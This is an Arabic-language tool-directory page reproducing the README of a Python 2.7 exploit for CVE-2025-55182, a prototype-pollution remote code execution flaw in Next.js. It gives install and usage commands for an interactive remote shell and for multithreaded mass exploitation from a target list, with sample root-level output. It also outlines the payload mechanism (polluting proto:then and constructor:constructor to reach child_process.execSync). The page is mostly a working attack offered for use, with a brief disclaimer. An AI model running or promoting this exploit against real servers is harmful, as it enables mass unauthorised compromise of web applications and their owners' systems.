Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

أداة استغلال CVE-2025-55182 – استغلال Python 2.7 لثغرة تلوث النموذج الأولي في Next.js مما يؤدي إلى RCE

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
61منذ 2 أشهرلم تتم المراجعة بعد

CVE-2025-55182 - React2shell

استغلال مكتوب بلغة Python 2.7 لثغرة CVE-2025-55182 – وهي ثغرة حرجة من نوع تلوّث النموذج الأولي (Prototype Pollution) / تنفيذ الأوامر عن بُعد (RCE) في تطبيقات Next.js.
تتيح هذه الأداة كلاً من الغلاف التفاعلي لهدف واحد والفحص الجماعي لعدة مضيفين، مع تعدد الخيوط، ومخرجات ملوّنة، واحتياط تلقائي إلى HTTPS.


🚀 الميزات

  • ✅ غلاف تفاعلي للأهداف المفردة – تنفيذ أي أوامر نظام
  • ✅ فحص جماعي من قائمة أهداف في ملف – متعدد الخيوط، سريع، وتُحفظ النتائج تلقائيًا
  • ✅ كشف تلقائي – رابط واحد ← وضع الغلاف، ملف موجود ← وضع الفحص الجماعي
  • ✅ HTTPS تلقائي – يُضيف https:// إذا لم يُحدَّد بروتوكول
  • ✅ كتابة ملفات آمنة للخيوط – يحفظ نتائج الأهداف المصابة في الوقت الفعلي
  • ✅ أوامر مخصصة – غيّر الأمر الافتراضي id إلى أي أمر (whoami, ls, وغيرها)
  • ✅ لا تبعيات خارجية – فقط requests (سهلة التثبيت)

📋 المتطلبات

  • Python 2.7 (الأداة مكتوبة خصيصًا لـ Python 2.7)
  • مكتبة requests – ثبّتها باستخدام:
    root@kitploit:~
    pip install requests
    

· طرفية تدعم ألوان ANSI (معظم طرفيات Linux/macOS، وWindows Terminal، وPowerShell)

📦 التثبيت

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

اجعل السكربت قابلاً للتنفيذ (اختياري):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 الاستخدام

  1. الغلاف التفاعلي (هدف واحد)
root@kitploit:~
python2 CVE-2025-55182.py https://target.com

أو بدون بروتوكول (يُضاف HTTPS تلقائيًا):

root@kitploit:~
python2 CVE-2025-55182.py target.com

بمجرد الاتصال والتأكد من وجود الثغرة، ستحصل على موجه أوامر الغلاف:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

الأوامر المدمجة:

· exit / quit – إغلاق الغلاف · clear – مسح الشاشة · help – إظهار المساعدة

  1. الفحص الجماعي (قائمة الأهداف)

جهّز ملفًا يحتوي هدفًا واحدًا في كل سطر (مع أو بدون http/https):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

شغّل الفحص الجماعي (الافتراضي: 10 خيوط، الأمر id، ملف الإخراج res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

خصّص عدد الخيوط والأمر وملف الإخراج:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt

· 20 – عدد الخيوط · whoami – الأمر الذي سيُنفَّذ على كل هدف مصاب · results.txt – ملف الإخراج (تُحفظ الإدخالات المصابة فقط)

مثال على مخرجات الفحص الجماعي:

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

النتائج المحفوظة (res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 كيف تعمل الأداة

يُرْسِل الاستغلال طلبًا مُصنَّعًا من نوع multipart/form-data إلى نقطة نهاية في تطبيق Next.js (يُضاف /login إذا كان المسار فارغًا). يستغل تلوّث النموذج الأولي (proto:then و constructor:constructor) لحقن بادئة خبيثة تنفّذ أمر نظام باستخدام child_process.execSync().

يستجيب الخادم بإعادة توجيه 303 تحتوي على مخرجات الأمر في الترويسة x-action-redirect (أو Location). تستخرج الأداة النتيجة من /login?a=.


🛡️ إخلاء المسؤولية

هذه الأداة مخصّصة للأغراض التعليمية واختبارات الأمان المصرّح بها فقط. الوصول غير المصرّح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ينجم عن هذا البرنامج. يجب أن تحصل على إذن كتابي صريح من مالك النظام المستهدف قبل استخدام هذا الاستغلال.

لمزيد من إخلاء المسؤولية، يمكنك الاطلاع عليه في الملف الشخصي لـ Jenderal92. يمكنك التحقق منه هنا !!!

تنزيل الأداة